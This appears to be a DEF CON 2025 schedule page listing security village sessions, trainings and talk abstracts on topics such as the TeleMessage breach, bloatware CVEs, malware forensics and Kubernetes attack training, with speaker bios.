14:00 - 14:50 Hack the Clock: Automating CVE Exploit searches to . . . Jordan Bonagura
14:00 - 14:50 Leveraging AI and MCP Servers for Automated Extern . . . Shane Krause
14:00 - 14:50 ModuleOverride – Changing a Tyre Whilst Driving Alessandro Grisa,Ibai Cas . . .
14:00 - 14:50 Adversary Intel Lab: Build Your First Threat Emula . . . Fredrik Sandström
15:00 - 16:59 Cyber Wargames: Redteam Rumble
15:00 - 15:50 Hybrid Attack Jonathan Coradi
15:00 - 15:50 From USB to C2 Will McGraw
15:00 - 15:50 AI-Powered Web Applications: A New Era in Security . . . Ilkin Javadov
15:00 - 15:50 EncryptedClientHelloWorld: TLSv1.3 ECH As A Covert . . . Jose Plascencia
Saturday
08:30 - 09:59 Cyber Wargames: King of the Hill
09:00 - 14:59 Cyber Wargames: Strategic Operations
10:00 - 10:55 Growing Red Team Village: What We’ve Learned Bui . . . Barrett Darnell,Mike Lisi . . .
11:00 - 16:50 BloodHound Enterprise CTF Hugo van den Toorn,Joey D . . .
11:00 - 14:50 Hacker Troll House James Rice
11:00 - 16:50 DNS-Based OSINT Tactics for Product and Service Di . . . Rishi "rxerium" Chudasama
11:00 - 16:50 Ransomware vs EDR: Inside the Attacker's Mind Zoziel Freire
11:00 - 11:50 Creating an AI Agent to Hack a Web Application Omar Santos
11:00 - 11:50 Malware Exploitation in PDFs: A Red Team Perspecti . . . Filipi Pires
11:00 - 11:50 Old Tactics, New Weapons: Abusing Modern Software . . . Roberto Soares
11:00 - 11:50 Whispers Through the Firewall: Data Exfiltration a . . . Hubert Lin
12:00 - 12:50 Getting Caught in Offensive Security Graham Helton,Kevin Clark . . .
13:00 - 14:50 Introduction to Operationalizing & Using C2 (w/ so . . . Gabi Joseph,Josh Millsap
13:00 - 14:50 StealthToken: Exploiting Identity Providers the Se . . . Manish Gupta,Yash Bharadw . . .
13:00 - 14:50 Building Your First Windows Malware Loader Royce Yaezenko
15:00 - 16:59 Cyber Wargames: Redteam Rumble
15:00 - 16:50 Mythic, Ghostwriter, Nemesis, and Tying the Room T . . . Michael Donley
15:00 - 15:50 From Prey to Playbook: Learning about victim behav . . . Megan Squire
15:00 - 16:50 Redteam Infrastructure Vibez Edition Moses Frost
15:00 - 16:50 Go Hack Yourself: API Hacking for Beginners Katie "InsiderPhD" Paxton . . .
15:00 - 15:50 Level UP OSINT Mishaal Khan
16:00 - 16:50 Don the Mantle: Red Team Campaign Planning and Exe . . . William Giles
16:00 - 16:50 Tales from the NIST AI Pen Test Challenge - AI Pe . . . Lee McWhorter
Sunday
10:00 - 11:55 Attacking Kubernetes: Tools and Tactics to Comprom . . . Lenin Alevski
10:00 - 11:55 OSINT Challenges Alex Ackerman,Lee McWhort . . .
10:00 - 11:45 Ask a Hiring Manager with Troy Fridley Troy Fridley
10:00 - 11:45 Ask a Hiring Manager with Cory Wolff Cory Wolff
10:00 - 11:45 Ask a Hiring Manager with Peter Hefley Peter Hefley

Return to Index

SEV - Social Engineering Village

Location: LVCCWest-Level3-W317-W319 - Map
Home Page: https://www.se.community/
DC Discord Chan: https://discord.com/channels/708208267699945503/732733952867172382


PDT Times Title speaker
Friday
08:30 - 08:59 Social Engineering Community Village Greeting and . . . Brent "TheDukeZip" Dukes
08:30 - 17:59 Social Engineering Community Village - Village Ope . . .
09:00 - 11:59 SEC Vishing Competition (SECVC)
12:00 - 13:30 Improv
13:30 - 15:30 SEC Vishing Competition (SECVC)
15:30 - 15:59 Improv
16:00 - 16:59 SEC Vishing Competition (SECVC)
17:00 - 17:59 Cold Calls
Saturday
10:30 - 10:55 Hacking the First Amendment: A press photographer' . . . Mansoor Ahmad,Brad Ammerm . . .
10:00 - 10:25 10 Lessons from the Frontlines of AI Vishing: From . . . Matt Holland,Enrico Facci . . .
10:00 - 17:59 Social Engineering Community Village - Village Ope . . .
11:00 - 11:25 The Devil Wears Headsets Cronkitten
11:30 - 11:55 The Human Vulnerability: Social Engineering in a H . . . fir3d0g
12:30 - 15:30 Battle of the Bots: Vishing Edition
12:00 - 12:30 Do Scammers dream of electric Phish? Lessons learn . . . Daniel Marques
15:30 - 17:59 Cold Calls
Sunday
10:00 - 10:45 Social Engineering Community Village - Contest Awa . . .
10:00 - 11:30 Social Engineering Community Village - Village Ope . . .
10:45 - 11:30 Cold Calls

Return to Index


PDT Times Title speaker
Saturday
10:00 - 10:45 Anotomy of Telecom Malware Akib Sayyed

Return to Index


PDT Times Title speaker
Saturday
08:00 - 16:59 Beginner's Guide to Attacks and Defenses Sam Bowne,Kaitlyn Handelm . . .
08:00 - 16:59 Medical Device Penetration Testing
08:00 - 16:59 Influence Operations: Tactics, Defense, and Exploi . . . Tom Cross,Greg Conti
Sunday
08:00 - 16:59 Influence Operations: Tactics, Defense, and Exploi . . . Tom Cross,Greg Conti
Monday
08:00 - 16:59 Dodging the EDR bullet: A Training on Malware Stea . . . Giorgio "gbyolo" Bernardi . . .
08:00 - 16:59 Adversarial Thinking: The Art of Dangerous Ideas Tom Cross,Greg Conti
08:00 - 16:59 Hacking Modern Web Apps: Master the Future of Atta . . . Abraham Aranguren,Anirudh . . .
08:00 - 16:59 Loudmouth Security - Offensive IoT Exploitation Loudmouth Security
08:00 - 16:59 Active Directory Attacks for Red and Blue Teams - . . . Nikhil,Manthan
08:00 - 16:59 Advanced Cloud Incident Response in Azure and Micr . . . Korstiaan Stam
08:00 - 16:59 Azure Cloud Attacks for Red & Blue Teams - Beginne . . . Nikhil
08:00 - 16:59 Windows Payload Development: EDR Evasion and Initi . . . Rey "Privesc" Bango,Kevin . . .
08:00 - 16:59 Hack the Connected Plant! Arnaud Soullié
08:00 - 16:59 Hands-on Car Hacking & Automotive Cybersecurity Kamel Ghali
08:00 - 16:59 Attack and Defend Software Supply Chain Anant Shrivastava
08:00 - 16:59 Everyday Ghidra: Practical Windows Reverse Enginee . . . John McIntosh
08:00 - 16:59 Full-Stack Pentesting Laboratory: 100% Hands-On + . . . Dawid Czagan
08:00 - 16:59 Simulated Adversary: Tactics & Tools Training Kenny Hess,Jayson E. Stre . . .
08:00 - 16:59 Deep Dive into Fuzzing Zubin Devnani,Dhiraj Mish . . .
08:00 - 16:59 Offensive Development Practitioner Certification ( . . . Jake Mayhew,Greg Hatcher
08:00 - 16:59 AI SecureOps: Attacking & Defending AI Application . . . Abhinav Singh
08:00 - 16:59 Offensive Cyber Security Operations: Mastering Bre . . . Abhijith "Abx" B R
08:00 - 16:59 A Practical Approach to Breaking & Pwning Kubernet . . . Madhu "madhuakula" Akula
08:00 - 16:59 Hacking Cryptography: Attacks, Tools, and Techniqu . . . Ruben Gonzalez,Benjamin W . . .
08:00 - 16:59 Solving Modern Cybersecurity Problems with AI “K” Singh,Michael "Bl . . .
08:00 - 16:59 Harnessing LLMs for Application Security Seth Law,Ken Johnson
08:00 - 16:59 A Complete Practical Approach to Malware Analysis . . . Sajan Shetty,Monnappa "Mo . . .
08:00 - 16:59 BRIDGING THE GAP - An Introduction to IoT Security . . . Will McCardell,Garrett Fr . . .
08:00 - 16:59 Attacking & Securing CI/CD Pipeline Certification . . . Raunak Parmar
08:00 - 16:59 RFID and Electronic Physical Access Control System . . . Deviant Ollam,Bryan Black . . .
08:00 - 16:59 Software Defined Radios 101 Richard Shmel
08:00 - 16:59 Hunting for Hackers by Deloitte Kyle Smathers,Bobby Thoma . . .
08:00 - 16:59 SOC 101 - SOC 1 Analyst Bootcamp Rod Soto
Tuesday
08:00 - 16:59 Software Defined Radios 101 Richard Shmel
08:00 - 16:59 SOC 101 - SOC 1 Analyst Bootcamp Rod Soto
08:00 - 16:59 Hacking Cryptography: Attacks, Tools, and Techniqu . . . Ruben Gonzalez,Benjamin W . . .
08:00 - 16:59 Beginner's Guide to Attacks and Defenses Sam Bowne,Kaitlyn Handelm . . .
08:00 - 16:59 Beginner's Guide to Attacks and Defenses Sam Bowne,Kaitlyn Handelm . . .
08:00 - 16:59 RFID and Electronic Physical Access Control System . . . Deviant Ollam,Bryan Black . . .
08:00 - 16:59 Beginner's Guide to Attacks and Defenses Sam Bowne,Kaitlyn Handelm . . .
08:00 - 16:59 Attacking & Securing CI/CD Pipeline Certification . . . Raunak Parmar
08:00 - 16:59 Medical Device Penetration Testing
08:00 - 16:59 BRIDGING THE GAP - An Introduction to IoT Security . . . Will McCardell,Garrett Fr . . .
08:00 - 16:59 Medical Device Penetration Testing
08:00 - 16:59 A Complete Practical Approach to Malware Analysis . . . Sajan Shetty,Monnappa "Mo . . .
08:00 - 16:59 Medical Device Penetration Testing
08:00 - 16:59 Solving Modern Cybersecurity Problems with AI “K” Singh,Michael "Bl . . .
08:00 - 16:59 Harnessing LLMs for Application Security Seth Law,Ken Johnson
08:00 - 16:59 A Practical Approach to Breaking & Pwning Kubernet . . . Madhu "madhuakula" Akula
08:00 - 16:59 Hunting for Hackers by Deloitte Kyle Smathers,Bobby Thoma . . .
08:00 - 16:59 AI SecureOps: Attacking & Defending AI Application . . . Abhinav Singh
08:00 - 16:59 Adversarial Thinking: The Art of Dangerous Ideas Tom Cross,Greg Conti
08:00 - 16:59 Offensive Cyber Security Operations: Mastering Bre . . . Abhijith "Abx" B R
08:00 - 16:59 Dodging the EDR bullet: A Training on Malware Stea . . . Giorgio "gbyolo" Bernardi . . .
08:00 - 16:59 Deep Dive into Fuzzing Zubin Devnani,Dhiraj Mish . . .
08:00 - 16:59 Offensive Development Practitioner Certification ( . . . Jake Mayhew,Greg Hatcher
08:00 - 16:59 Full-Stack Pentesting Laboratory: 100% Hands-On + . . . Dawid Czagan
08:00 - 16:59 Simulated Adversary: Tactics & Tools Training Kenny Hess,Jayson E. Stre . . .
08:00 - 16:59 Attack and Defend Software Supply Chain Anant Shrivastava
08:00 - 16:59 Everyday Ghidra: Practical Windows Reverse Enginee . . . John McIntosh
08:00 - 16:59 Hack the Connected Plant! Arnaud Soullié
08:00 - 16:59 Hands-on Car Hacking & Automotive Cybersecurity Kamel Ghali
08:00 - 16:59 Azure Cloud Attacks for Red & Blue Teams - Beginne . . . Nikhil
08:00 - 16:59 Windows Payload Development: EDR Evasion and Initi . . . Rey "Privesc" Bango,Kevin . . .
08:00 - 16:59 Active Directory Attacks for Red and Blue Teams - . . . Nikhil,Manthan
08:00 - 16:59 Advanced Cloud Incident Response in Azure and Micr . . . Korstiaan Stam
08:00 - 16:59 Hacking Modern Web Apps: Master the Future of Atta . . . Abraham Aranguren,Anirudh . . .
08:00 - 16:59 Loudmouth Security - Offensive IoT Exploitation Loudmouth Security

Return to Index

Talk/Event Descriptions



DCT - Saturday - 16:00-16:45 PDT


Title: "We are currently clean on OPSEC": The Signalgate Saga
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

In March, former national security advisor Mike Waltz accidentally invited a journalist into his war crimes Signal group with other senior Trump officials. “We are currently clean on OPSEC,” secretary of defense Pete Hegseth posted to the group. In May, Waltz was photographed clandestinely checking his Signal messages under the table during a cabinet meeting.

Only it turns out, Waltz was actually using a knock-off of Signal called TM SGNL. Immediately after that, TeleMessage (the company that makes TM SNGL) was hacked, and the hacker was able to access plaintext Signal messages. It was then hacked again, and the second hacker exfiltrated hundreds of gigabytes of data before TeleMessage took its service offline.

This talk is about the entire TeleMessage saga: the history of the company, which was founded by a former Israeli spook; its customers – Trump officials, US Customs and Border Protection, crypto firms, etc.; how TeleMessage archives Signal, WhatsApp, Telegram, WeChat, and SMS messages; an analysis of the TM SGNL source code that proves the company lied about supporting end-to-end encryption; the trivial exploit that was used to extract data from TeleMessage’s archive server; and how I analyzed hundreds of gigabytes of memory dumps full of chat logs from TeleMessage customers.

References:

SpeakerBio:  Micah "micahflee" Lee

Micah is a member of the Lockdown Systems collective. He's a coder, a security researcher, and an independent journalist. He develops open source privacy and security tools, and he's done a lot of work related to journalism and whistleblowing. He’s the former director of infosec for The Intercept. He wrote a book that teaches people how to analyze hacked and leaked datasets, Hacks, Leaks, and Revelations. He really doesn’t like the technofascist future we’ve all been forced into.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 14:30-14:59 PDT


Title: #ReclaimTech - A community movement
When: Saturday, Aug 9, 14:30 - 14:59 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

What would it take to start a movement away from the major platforms, for people to #reclaimtech for themselves from the clutches of multi-billion dollar companies and VC backed unicorns, retrieving our data, our autonomy, and our sovereignty? We are a collection of conscientious objectors to the Big Tech ecosystems building community around peer-to-peer support and connection as we exit from these extractive ecosystems. Opting out of toxic systems, we believe, is not about digital minimalism but about opting in to stronger connections, more ethical systems, and a better future. In this talk, the Founders of Tech Reclaimers introduce our approach to bringing tech sovereignty to the masses: meeting people where they are, joining them on their journey, building confidence step by step, and fostering community in the process.

Speakers:Janet Vertesi,Andy Hull

SpeakerBio:  Janet Vertesi, Reclaim Tech

Janet Vertesi (she/hers) is associate professor of sociology at Princeton University, where she is well known for her ìopt out experimentsî to evade tracking by data companies and embrace alternative tech systems, as well as for her in-depth studies of NASAís teams. An expert in the nexus between technology and society, she is a mobile Linux evangelist, teaches courses in critical technical practice and design, and sits on the advisory boards of the Data & Society Institute and the Electronic Privacy Information Center. Ask her how to make sure the Internet doesnít know that youíre pregnant.

SpeakerBio:  Andy Hull, Reclaim Tech (https://www.reclaimcontrol.tech/)

Andy Hull (he/him) has been abusing computers since they came with cassettes and not enough RAM. He dabbles with recreational hacking, enjoys a spot of light homelabbing, and still dreams of being a Demoscener next year. Andy believes that computers should be tools that set us free and enshrine our rights as humans, not abusive platforms that imprison and enrage us.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 22:00-01:59 PDT


Title: +61: the Australian Embassy
When: Friday, Aug 8, 22:00 - 01:59 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Have you ever tried Vegemite or like conversing in a foreign language? Do you miss familiar twangs or water flowing down a sink in the right direction? +61: the Australian Embassy is the meetup just for you. Every year a few random Australians end up coalescing around an inflatable kangaroo somewhere in the halls and this year we decided to get our shit together and find a place to catch up, share notes, reminisce about your adventure to the Bass Pro Shop and complain about the jetlag. Feel free to join us (or dont) as we catch up on the happenings of hacker summer camp.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 10:00-10:25 PDT


Title: 10 Lessons from the Frontlines of AI Vishing: From Zero to (Almost) Hero
When: Saturday, Aug 9, 10:00 - 10:25 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

The path from a working demo to an AI vishing agent that can survive in the wild is littered with failed calls and bad prompts. We walked that path so you don't have to. This talk is a rapid-fire rundown of 10 lessons learned from taking a bot into production. We'll dive into: how to craft pretexts that don't collapse under pressure, the dirty secrets of managing conversational latency, and the surprising challenge of handling accents and background noise. Iíll break down the trade-offs between self-hosted models and commercial API infrastructure, their inherent limitations, and the privacy considerations to address. Learn how to tune prompts for believable improvisation and avoid the uncanny valley.

Speakers:Matt Holland,Enrico Faccioli

SpeakerBio:  Matt Holland

Matt Holland is a startup co-founder and CISO who builds security solutions designed for the real world. His career has taken him from leading security for iconic brands like Unilever and the John Lewis Partnership to his current role as co-founder of vishr.ai, a venture tackling the threat of AI-driven social engineering. His approach is a product of that journey. He tackles every challenge by blending the strategic discipline of a global CISO, the commercial focus of an MBA, the relentless drive of a startup founder, and the adversarial mindset needed to counter modern threats.

SpeakerBio:  Enrico Faccioli

Enrico Faccioli is a London-based entrepreneur tackling AI-driven social engineering. His latest venture, vishr.ai, uses conversational AI to provide employees with realistic vishing simulations and hands-on training. Following his MSc in Finance from Warwick Business School, he moved from overseeing the tech strategy for L&G's real assets funds (£28bn AUM), into startup leadership as COO of the geospatial AI startup Gyana, before a breach of his own fuelled a pivot into solving critical security challenges.


Return to Index    -    Add to Google    -    ics Calendar file

IOTV - Friday - 10:30-10:59 PDT


Title: 10 Years of IoT Village: Insights in the World of IoT
When: Friday, Aug 8, 10:30 - 10:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Join IoT Village co-founders Steve Bono and Ted Harrington as they discuss how the world of IoT security has evolved in the past 10 years of IoT Village. Led by panel host Rachael Tubbs, Steve and Ted will discuss with industry experts what we've learned in 10 years about the state of IoT security.

Speakers:Stephen Bono,Rachael Tubbs

SpeakerBio:  Stephen Bono, CEO at Independent Security Evaluators
No BIO available
SpeakerBio:  Rachael Tubbs, IoT Village Organizer
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCW - Friday - 14:00-17:59 PDT


Title: 64-bit Intel Assembly Language Programming for Hackers
When: Friday, Aug 8, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N253 - Map

Description:

Assembly language has a reputation for being intimidating, but once you learn the basics--and know how to read the documentation for the rest--you can easily pick up the rest. There are many interesting fields of study in computer security that depend on the "closer to the metal" knowledge you'll gain from learning to code in assembly:

...among others. There is no substitute for the confidence that you gain from being able to research and understand computer systems at lower levels of abstraction.

The purpose of this workshop is to introduce Intel x64 architecture and assembly language to the attendees. We will be using the Microsoft Macro Assembler, and we will be examining our code step-by-step in the x64dbg debugger. No prior programming experience is required--we will be working on things from first principles. There will be few slides. This is a new version of the workshop that makes better use of the x64dbg debugger to illustrate concepts of the class, live. Attendees can follow along with their own laptops and programming environments.

SpeakerBio:  Wesley McGrew

Dr. Wesley McGrew is a house music DJ that also directs research, development, and offensive cyber operations as Senior Cybersecurity Fellow for MartinFederal. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA and teaches self-designed courses on software reverse engineering and assembly language programming. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 16:30-17:15 PDT


Title: 7 Vulns in 7 Days: Breaking Bloatware Faster Than It’s Built
When: Saturday, Aug 9, 16:30 - 17:15 PDT
Where: LVCCWest-Level1-Hall3-Track 4 - Map

Description:

Bloatware. We all hate it, and most of us are good at avoiding it. But some vendor tools – especially those managing critical drivers – can be useful when the Windows Update versions aren’t good enough for performance-critical computing.

What started as a routine driver update took a sharp turn when I confirmed a reboot modal… from my browser. Wait, my browser shouldn’t be able to do that!? To my disappointment (and maybe some surprise), it turned out to be arbitrary code execution – right from the browser. This kicked off a week-long deep dive, uncovering seven CVEs in seven days across several prominent vendors, all exploiting a common pattern: privileged services managing software on Windows with little regard for security.

In this talk, I’ll walk through the journey of discovery and exploitation of several vulnerabilities that lead to LPE/RCE. I'll cover everything from the initial attack surface discovery, reverse engineering and finally exploitation of several vulnerabilities. By the end, participants will probably be uninstalling similar software mid-session. While the exploitation journey is fun and impactful, this isn’t the kind of “access everywhere” anyone wants. It’s 2025 – we have everything we need to do better.

References:

SpeakerBio:  Leon "leonjza" Jacobs

With over two decades in IT - 15 years focused on cybersecurity - Leon is the CTO of Orange Cyberdefense’s SensePost Team. His career has taken him from a Tier 1 ISP, a private investment bank and now into full-time consulting, giving him a broad, real-world view of security challenges across industries. Today, Leon spends his time researching and hacking everything from enterprise networks to web and mobile applications. Passionate about building and innovating, he’s a regular contributor to the InfoSec community, sharing tools, insights, and lessons learned to help push the field forward.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: A Complete Practical Approach to Malware Analysis & Threat Hunting Using Memory Forensics
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This 2-day hands-on training teaches the concepts, tools, and techniques to analyze, investigate, and hunt malware by combining two powerful techniques: malware analysis and memory forensics. This course will introduce attendees to the basics of malware analysis, reverse engineering, Windows internals, and memory forensics. Then it gradually progresses into more advanced concepts of malware analysis & memory forensics. Attendees will learn to perform static, dynamic, code, and memory analysis. To keep the training completely practical, it consists of various scenario-based hands-on labs after each module which involves analyzing real-world malware samples and investigating malware-infected memory images (crimewares, APT malwares, Fileless malwares, Rootkits, etc.). This hands-on training is designed to help attendees gain a better understanding of the subject in a short period. Throughout the course, the attendees will learn the latest techniques used by adversaries to compromise and persist on the system. In addition, it also covers various code injection, hooking, and rootkit techniques used by adversaries to bypass forensic tools and security products. In this training, you will also understand how to integrate malware analysis and memory forensics techniques into a custom sandbox to automate malware analysis. After taking this course, attendees will be better equipped with the skills to analyze, investigate, hunt, and respond to malware-related incidents.

Whether you are a beginner interested in learning malware analysis, threat hunting, and memory forensics from scratch or an experienced professional who would like to enhance your existing skills to perform a forensic investigation to respond to an incident or for fun, this training will help you accomplish your goals.

Note: Students will be provided with real-world malware samples, malware-infected memory images, course material, lab solution manual, video demos, custom scripts, and a Linux VM.

Attendees should walk away with the following skills:

Speakers:Sajan Shetty,Monnappa "Monnappa22" K A

SpeakerBio:  Sajan Shetty

Sajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.

SpeakerBio:  Monnappa "Monnappa22" K A, Co-Founder at Cysinfo

Monnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: A Complete Practical Approach to Malware Analysis & Threat Hunting Using Memory Forensics
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

This 2-day hands-on training teaches the concepts, tools, and techniques to analyze, investigate, and hunt malware by combining two powerful techniques: malware analysis and memory forensics. This course will introduce attendees to the basics of malware analysis, reverse engineering, Windows internals, and memory forensics. Then it gradually progresses into more advanced concepts of malware analysis & memory forensics. Attendees will learn to perform static, dynamic, code, and memory analysis. To keep the training completely practical, it consists of various scenario-based hands-on labs after each module which involves analyzing real-world malware samples and investigating malware-infected memory images (crimewares, APT malwares, Fileless malwares, Rootkits, etc.). This hands-on training is designed to help attendees gain a better understanding of the subject in a short period. Throughout the course, the attendees will learn the latest techniques used by adversaries to compromise and persist on the system. In addition, it also covers various code injection, hooking, and rootkit techniques used by adversaries to bypass forensic tools and security products. In this training, you will also understand how to integrate malware analysis and memory forensics techniques into a custom sandbox to automate malware analysis. After taking this course, attendees will be better equipped with the skills to analyze, investigate, hunt, and respond to malware-related incidents.

Whether you are a beginner interested in learning malware analysis, threat hunting, and memory forensics from scratch or an experienced professional who would like to enhance your existing skills to perform a forensic investigation to respond to an incident or for fun, this training will help you accomplish your goals.

Note: Students will be provided with real-world malware samples, malware-infected memory images, course material, lab solution manual, video demos, custom scripts, and a Linux VM.

Attendees should walk away with the following skills:

Speakers:Sajan Shetty,Monnappa "Monnappa22" K A

SpeakerBio:  Sajan Shetty

Sajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.

SpeakerBio:  Monnappa "Monnappa22" K A, Co-Founder at Cysinfo

Monnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-15:50 PDT


Title: A Look into Using Native Godot Calls to Create Malware
When: Friday, Aug 8, 14:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Tactics 4 - Map

Description:

Using built in RPC calls godot allows for peer-to-peer calls were logic can be hidden on one side of the application versus the other.

SpeakerBio:  Aaron Hogan

A long time contributor to the community with some random knowledge in different parts of the cybersecurity field.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: A Practical Approach to Breaking & Pwning Kubernetes Clusters
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

The adoption of Kubernetes use in production has increased to 83% from a survey by CNCF. Still, most security teams struggle to understand these modern technologies.

In this real-world scenario-based training, each participant will be learning Tactics, Techniques, and Procedures (TTPs) to attack and assess Kubernetes clusters environments at different layers like Supply chain, Infrastructure, Runtime, and many others. Starting from simple recon to gaining access to microservices, sensitive data, escaping containers, escalating to clusters privileges, and even its underlying cloud environments.

By end of the training, participants will be able to apply their knowledge to perform architecture reviews, security assessments, red team exercises, and pen-testing engagements on Kubernetes Clusters and Containersed environments successfully. Also, the trainer will provide step by step guide (Digital Book) with resources and references to further your learning.

SpeakerBio:  Madhu "madhuakula" Akula, Pragmatic Security Leader

Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.

Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200+ companies and organizations including; Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, Adobe, etc. and is credited with multiple CVE’s, Acknowledgements, and rewards. He is co-author of Security Automation with Ansible2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible. He is the technical reviewer for Learn Kubernetes Security, Practical Ansible2 books by Packt Pub. Also won 1st prize for building an Infrastructure Security Monitoring solution at InMobi flagship hackathon among 100+ engineering teams.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: A Practical Approach to Breaking & Pwning Kubernetes Clusters
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

The adoption of Kubernetes use in production has increased to 83% from a survey by CNCF. Still, most security teams struggle to understand these modern technologies.

In this real-world scenario-based training, each participant will be learning Tactics, Techniques, and Procedures (TTPs) to attack and assess Kubernetes clusters environments at different layers like Supply chain, Infrastructure, Runtime, and many others. Starting from simple recon to gaining access to microservices, sensitive data, escaping containers, escalating to clusters privileges, and even its underlying cloud environments.

By end of the training, participants will be able to apply their knowledge to perform architecture reviews, security assessments, red team exercises, and pen-testing engagements on Kubernetes Clusters and Containersed environments successfully. Also, the trainer will provide step by step guide (Digital Book) with resources and references to further your learning.

SpeakerBio:  Madhu "madhuakula" Akula, Pragmatic Security Leader

Madhu Akula is a pragmatic security leader and creator of Kubernetes Goat, an intentionally vulnerable by design Kubernetes Cluster to learn and practice Kubernetes Security. Also published author and Cloud Native Security Architect with extensive experience. Also, he is an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc). He holds industry certifications like CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), OSCP (Offensive Security Certified Professional), etc.

